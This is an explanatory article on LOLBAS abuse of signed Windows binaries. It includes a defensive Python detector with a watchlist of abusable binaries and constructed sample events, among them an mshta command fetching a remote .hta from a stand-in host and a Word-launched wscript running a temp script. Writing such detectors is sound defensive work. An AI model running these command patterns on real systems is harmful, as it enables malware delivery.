In the world of IT and cybersecurity, there’s a funny-looking word that might raise your eyebrows: LOLBAS. It stands for Living-off-the-Land Binaries and Scripts. While it sounds silly, it refers to ordinary files like your favorite Microsoft Office apps and other executables that you find on your computer. These seemingly innocuous files can become powerful tools in the hands of cybercriminals when used maliciously, turning your computer into a hacker’s playground.

The paranoid in you might start panicking and delete every unfamiliar executable file you see on your computer. The problem is that LOLBAS files are legitimate files that your Windows operating system most likely needs in order to work normally. Many of them are also digitally signed by Microsoft, which attests to their validity and authenticity, but that is also exactly what makes them attractive to attackers.

Since users and security systems trust these signed files, malicious activities carried out through them can slip under the radar undetected. LOLBAS files can be abused and manipulated to download and run malicious payloads, and your computer’s antivirus and other security mechanisms may not raise any alarms.


In January 2023, a paper described how the QakBot malware was able to spread by exploiting a common LOLBAS file called WScript.exe, a Windows service that provides scripting abilities.
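The two paragraphs above describe the defender's problem: a signed system binary such as WScript.exe runs without tripping signature-based controls, so the abuse has to be spotted from context instead (who launched it, and what it was told to do). The following is an added example that is not part of the original article or of any referenced research. It runs a small set of context rules over constructed process-creation events in a simplified Sysmon-like shape (Image, ParentImage, CommandLine); the watchlist of binaries and the Office parent list are illustrative subsets chosen for this example, not the full LOLBAS catalogue.

```python
import ntpath

# Illustrative subset of LOLBAS binaries that can execute scripts or fetch content.
# Constructed for this example; the real catalogue is much longer.
LOLBAS_WATCHLIST = {
    "wscript.exe", "cscript.exe", "mshta.exe", "regsvr32.exe",
    "rundll32.exe", "certutil.exe", "powershell.exe", "msiexec.exe",
}

# Office applications: a script host launched directly by one of these is the
# classic document-macro-to-LOLBAS chain and is worth an alert on its own.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Command-line fragments that indicate a remote payload location (URL or UNC path).
NETWORK_HINTS = ("http://", "https://", "\\\\")


def _basename(path):
    """Lower-cased file name from a Windows path, e.g. C:\\Windows\\notepad.exe -> notepad.exe."""
    return ntpath.basename(path).lower()


def score_event(event):
    """Return the list of reasons an event looks like LOLBAS abuse (empty list = nothing suspicious).

    The binary being signed and legitimate is assumed; the signal comes purely from
    the parent process and the command line, which is where the misuse shows.
    """
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "").lower()
    reasons = []
    if image not in LOLBAS_WATCHLIST:
        return reasons
    if parent in OFFICE_PARENTS:
        reasons.append(f"{image} spawned by Office application {parent}")
    if any(hint in cmdline for hint in NETWORK_HINTS):
        reasons.append(f"{image} invoked with a remote location on its command line")
    return reasons


def detect(events):
    """Return (RecordId, reasons) pairs for every event that scores at least one reason."""
    hits = []
    for event in events:
        reasons = score_event(event)
        if reasons:
            hits.append((event.get("RecordId"), reasons))
    return hits


# Constructed sample events (not real telemetry). RecordId 1 and 4 are benign:
# an ordinary editor, and an admin script run from a local path. RecordId 2 is the
# macro-to-script-host pattern; RecordId 3 points a script host at a remote file.
SAMPLE_EVENTS = [
    {"RecordId": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\notepad.exe" C:\Users\alice\notes.txt'},
    {"RecordId": 2, "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'wscript.exe C:\Users\alice\AppData\Local\Temp\invoice.js'},
    {"RecordId": 3, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe https://example.invalid/update.hta"},
    {"RecordId": 4, "Image": r"C:\Windows\System32\cscript.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cscript.exe //nologo C:\Scripts\inventory.vbs"},
]

if __name__ == "__main__":
    for record_id, reasons in detect(SAMPLE_EVENTS):
        print(f"RecordId {record_id}:")
        for reason in reasons:
            print(f"  - {reason}")
```

Run against the constructed events, only records 2 and 3 are reported; record 4 shows why the rules look at context rather than the binary name alone, since a script host started from a shell with a local script is routine administration. In a real deployment the same logic would consume Sysmon Event ID 1 or Windows Security 4688 records with command-line auditing enabled, and the lists would be tuned to the environment.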

Popular third-party executables can be exploited as well, as security researcher Nir Chako showed when he created a tool to automate the discovery of exploitable executables.

In his published research, Chako stated that knowing in advance which executable files are potential targets helps organizations take the necessary precautions and mitigate the risk. It also pays for ordinary users to stay informed, keep their software updated, and practice safe browsing: a single click on a malicious link is often all that is needed to trigger a malware infection.
